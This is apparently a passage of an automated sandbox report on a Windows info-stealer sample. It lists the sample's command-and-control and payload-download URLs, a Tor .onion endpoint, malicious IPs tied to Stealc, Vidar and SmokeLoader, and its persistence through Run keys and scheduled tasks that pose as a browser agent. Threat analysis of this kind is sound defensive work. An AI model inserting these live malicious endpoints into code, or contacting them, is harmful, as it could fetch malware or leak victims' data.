http://cream.hitsturbo.com/order/tuc5.exe	true	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://46.246.96.149/getcommands	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.76.36/f059ec3d7eb90876/freebl3.dll	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://iplogger.com/19nVA4	false		high
http://46.246.96.149/browsers	true	Avira URL Cloud: safe	unknown
http://46.246.96.149/defenders	true	Avira URL Cloud: safe	unknown
http://77.91.76.36/f059ec3d7eb90876/msvcp140.dll	true	Avira URL Cloud: safe	unknown
http://sumagulituyo.org/	false	URL Reputation: malware	unknown
https://www.kaspersky.com/	false		high
http://api.ipify.org/?format=dfg	false		high
https://zonealarm.com/	false		high
http://77.91.76.36/3886d2276f6914c4.php	true	Avira URL Cloud: safe	unknown
http://46.246.96.149/osinfo	true	Avira URL Cloud: safe	unknown
http://lightseinsteniki.org/	true	URL Reputation: safe	unknown
http://46.246.96.149/softwares	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000000.2031996552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 00000002.00000000.2034581816.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.torproject.org/	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://excel.office.com	explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false		high
https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.micro	explorer.exe, 00000002.00000000.2031575529.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2031598650.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2031157062.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/upd.php?n=64F78ABE71A43EFA66FB	820.exe, 00000006.00000002.4437239960.0000000003697000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://login.live.co	svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html#	16E6.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html#	16E6.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.torproject.org/documentation.html	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
http://HTTP://HTTPS://https://httpclientcpp-agent/1.0	16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2034581816.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://46.246.96.149/	16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://trac.torproject.org/projects/tor/ticket/14917.	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2031996552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re	820.exe, 00000006.00000002.4431451107.0000000000824000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
https://curl.se/docs/alt-svc.html	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
https://outlook.com	explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high
http://46.246.96.149/e_userGoogle	16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sabotage.net	820.exe, 00000006.00000003.2414883730.000000000338E000.00000004.00000001.00020000.00000000.sdmp, 820.exe, 00000006.00000003.2418648664.00000000037B5000.00000004.00000020.00020000.00000000.sdmp, 820.exe, 00000006.00000003.2437088799.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, 820.exe, 00000006.00000003.2415192472.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, 820.exe, 00000006.00000002.4435371639.00000000029D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2030558145.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL	820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.msn.com/	explorer.exe, 00000002.00000000.2031996552.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html#	16E6.exe	false	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000002.00000000.2029099333.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.138.16.94	unknown	Netherlands	62068	SPECTRAIPSpectraIPBVNL	false
104.198.2.251	snukerukeutit.org	United States	15169	GOOGLEUS	false
77.91.76.36	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true
192.36.38.33	unknown	Sweden	57169	EDIS-AS-EUAT	false
34.94.245.237	sumagulituyo.org	United States	15169	GOOGLEUS	false
192.121.44.26	unknown	Sweden	29518	BREDBAND2SE	false
94.131.119.85	unknown	Ukraine	29632	NASSIST-ASGI	false
5.42.65.125	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
195.158.3.162	ftpvoyager.cc	Uzbekistan	8193	BRM-ASUZ	true
46.246.96.149	unknown	Sweden	42708	PORTLANEwwwportlanecomSE	true
172.67.168.30	cream.hitsturbo.com	United States	13335	CLOUDFLARENETUS	true
173.231.16.77	api4.ipify.org	United States	18450	WEBNXUS	false
91.215.85.17	stualialuyastrelia.net	Russian Federation	34665	PINDC-ASRU	true
172.67.188.178	iplogger.com	United States	13335	CLOUDFLARENETUS	false
212.118.39.73	unknown	Russian Federation	25308	CITYLAN-ASRU	true
34.143.166.163	lightseinsteniki.org	United States	2686	ATGS-MMD-ASUS	true
172.67.176.11	chincenterblandwka.pw	United States	13335	CLOUDFLARENETUS	false
91.92.254.7	unknown	Bulgaria	34368	THEZONEBG	false
185.85.15.47	multisite3.geo.kaspersky.com	Russian Federation	200107	KL-EXTRU	false
185.85.15.46	unknown	Russian Federation	200107	KL-EXTRU	false
103.253.41.98	unknown	Hong Kong	133398	TELE-ASTeleAsiaLimitedHK	false
209.87.209.205	zonealarm.com	United States	31997	ZONEALARM-COMUS	false
158.160.130.138	host-host-file8.com	Venezuela	721	DNIC-ASBLK-00721-00726US	true
5.135.177.217	unknown	France	16276	OVHFR	false
5.42.64.35	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1366691
Start date and time:	2023-12-24 10:43:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	16GAuqLUFK.exe renamed because original name is a hash value
Original Sample Name:	fcd15e71512e00af86732fb04281cf03.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@94/139@33/26
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.126.28.14, 40.126.28.20, 40.126.28.13, 40.126.28.11, 40.126.28.23, 40.126.28.19, 40.126.28.18, 40.126.28.22, 52.168.117.173, 20.189.173.20, 20.42.65.92, 23.15.53.161
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, bvnwgzb.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, e9181.dscf.akamaiedge.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, www.zonealarm.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:44:01	API Interceptor	242474x Sleep call for process: explorer.exe modified
10:44:12	Task Scheduler	Run new task: Firefox Default Browser Agent 447A667305733365 path: C:\Users\user\AppData\Roaming\eieeggj
10:44:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
10:44:28	API Interceptor	4x Sleep call for process: 23F8.exe modified
10:44:30	API Interceptor	20391x Sleep call for process: 28CC.exe modified
10:44:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
10:44:37	API Interceptor	6x Sleep call for process: 288c47bbc1871b439df19ff4df68f076.exe modified
10:44:47	API Interceptor	1x Sleep call for process: WerFault.exe modified
10:44:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HostFile C:\Users\user\AppData\Local\Temp\svchost.exe
10:44:58	API Interceptor	1x Sleep call for process: 16E6.exe modified
10:45:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce HostFile C:\Users\user\AppData\Local\Temp\svchost.exe
10:45:07	API Interceptor	3050x Sleep call for process: 820.exe modified
10:45:08	Task Scheduler	Run new task: Firefox Default Browser Agent AC7EA5827440485D path: C:\Users\user\AppData\Roaming\ireeggj
10:45:18	API Interceptor	11672x Sleep call for process: csrss.exe modified
10:47:46	API Interceptor	1x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.91.76.36	NW2R35hrnn.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	l6ZfQKYXG6.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	UysPRDz7an.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	VS0PkCnLlg.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	U1MiP25NrU.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	syncUpd.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	7C3J00l6fa.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	77.91.76.36/3886d2276f6914c4.php
	8RYB9RzQA5.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	77.91.76.36/f059ec3d7eb90876/softokn3.dll
	tx2WEPjzLS.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, zgRAT	Browse	77.91.76.36/3886d2276f6914c4.php
	GarEwUZuLO.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	Zgh9WMogTw.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	77.91.76.36/3886d2276f6914c4.php
	o7dKnIGaW3.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	bbSC5jm8tF.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar, zgRAT	Browse	77.91.76.36/3886d2276f6914c4.php
	74APa4Tj5X.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	Ahn3lzq3wm.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	rpmOhktwoL.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	77.91.76.36/3886d2276f6914c4.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	V183e4vaO8.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php
	QZRWzzc942.exe	Get hash	malicious	Amadey, Glupteba, SmokeLoader, Stealc, Vidar	Browse	77.91.76.36/3886d2276f6914c4.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ftpvoyager.cc	qrtzqUHSqT.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	175.120.254.9
	HVqTxn73uD.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	211.171.233.129
	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	187.211.8.246
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	211.53.230.67
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	195.158.3.162
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	187.156.96.226
	ZRgv8wdMtR.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	2.180.10.7
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	179.153.102.52
	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	91.104.83.7
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	14.33.209.147
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	211.53.230.67
	B843BuO7i3.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	187.156.96.226
	8as7BA35XQ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	211.104.254.139
	82YWwkVfIS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	186.147.159.149
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	95.158.162.200
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	211.53.230.67
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	95.86.30.3
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	189.232.1.60
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	95.158.162.200
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	180.94.156.61
cream.hitsturbo.com	qrtzqUHSqT.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	104.21.46.59
	xqz8sQ4mZB.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	104.21.46.59
	HVqTxn73uD.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	172.67.168.30
	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.168.30
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.168.30
	ZRgv8wdMtR.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59
	3yPvcmrbqS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	172.67.168.30
	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	104.21.46.59
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	172.67.168.30
	B843BuO7i3.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	172.67.168.30
	file.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, RisePro Stealer, SmokeLoader, Vidar	Browse	104.21.46.59
	SyD1FiOG1p.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	NW2R35hrnn.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36
	l6ZfQKYXG6.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36
	7zrLU5V186.exe	Get hash	malicious	Glupteba, Neoreklami, Stealc, Vidar	Browse	77.91.76.36
	SecuriteInfo.com.Win64.PWSX-gen.2315.32186.exe	Get hash	malicious	SmokeLoader, Stealc, Vidar	Browse	77.91.76.36
	XKpsAUCtnp.exe	Get hash	malicious	Glupteba, Stealc, Vidar	Browse	77.91.76.36
	UysPRDz7an.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36
	VS0PkCnLlg.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36
	U1MiP25NrU.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	77.91.76.36
	syncUpd.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.76.36
	7C3J00l6fa.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	77.91.76.36
	8RYB9RzQA5.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	77.91.76.36
	tx2WEPjzLS.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, zgRAT	Browse	77.91.76.36
	FACFFEA545BA2D1D9E9AB4ED74.dll	Get hash	malicious	Unknown	Browse	77.91.73.187
	GarEwUZuLO.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36
	Zgh9WMogTw.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	77.91.76.36
	o7dKnIGaW3.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36
	bbSC5jm8tF.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar, zgRAT	Browse	77.91.76.36
	74APa4Tj5X.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36
	Ahn3lzq3wm.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	77.91.76.36
SPECTRAIPSpectraIPBVNL	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	45.141.215.4
	file.exe	Get hash	malicious	BazaLoader	Browse	45.141.215.97
	8KT6I2wZLl.exe	Get hash	malicious	BazaLoader	Browse	45.141.215.74
	file.exe	Get hash	malicious	BazaLoader	Browse	45.141.215.84
	FzpdcKlWfd.elf	Get hash	malicious	Gafgyt	Browse	45.140.141.180
	47rR4jIgtD.exe	Get hash	malicious	Raccoon Stealer v2, zgRAT	Browse	45.137.206.42
	JckwTRHObq.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse	45.138.16.214
	cutie.arm7-20231011-2200.elf	Get hash	malicious	Mirai	Browse	185.224.128.191
	tMIkWuvlXg.wsf	Get hash	malicious	Unknown	Browse	45.141.215.77
	tt.html	Get hash	malicious	Unknown	Browse	45.141.215.77
	irs-statement.exe	Get hash	malicious	Unknown	Browse	45.141.215.226
	irs-statement.exe	Get hash	malicious	Unknown	Browse	45.141.215.226
	saham.apk	Get hash	malicious	IRATA	Browse	185.224.129.162
	T2.jpg.ps1	Get hash	malicious	AsyncRAT	Browse	45.141.215.77
	Stub.exe	Get hash	malicious	AsyncRAT	Browse	45.141.215.77
	muhL0mLsAj.elf	Get hash	malicious	Mirai	Browse	45.142.6.252
	https://storage.webfiledata.com/ui_static.js?ver=v8pfv00nl7iyzypayorsh	Get hash	malicious	Unknown	Browse	45.130.201.22
	http://185.224.128.251	Get hash	malicious	Unknown	Browse	185.224.128.251
	wzEQmMNRNT.exe	Get hash	malicious	Blank Grabber	Browse	45.141.215.252
	jeB6vVWLIf.exe	Get hash	malicious	FormBook	Browse	45.14.226.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse	172.67.176.11
	5kE9Ks1Yp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	172.67.176.11
	MdK7YlTyhS.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	172.67.176.11
	file.exe	Get hash	malicious	Unknown	Browse	172.67.176.11
	file.exe	Get hash	malicious	Unknown	Browse	172.67.176.11
	B3xMYeYGnP.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.176.11
	MF_PERIOD_END_P03_21.12.2023.xls	Get hash	malicious	Unknown	Browse	172.67.176.11
	qrtzqUHSqT.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	172.67.176.11
	fY2HAd4r9I.exe	Get hash	malicious	Amadey, Easy Stealer, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	172.67.176.11
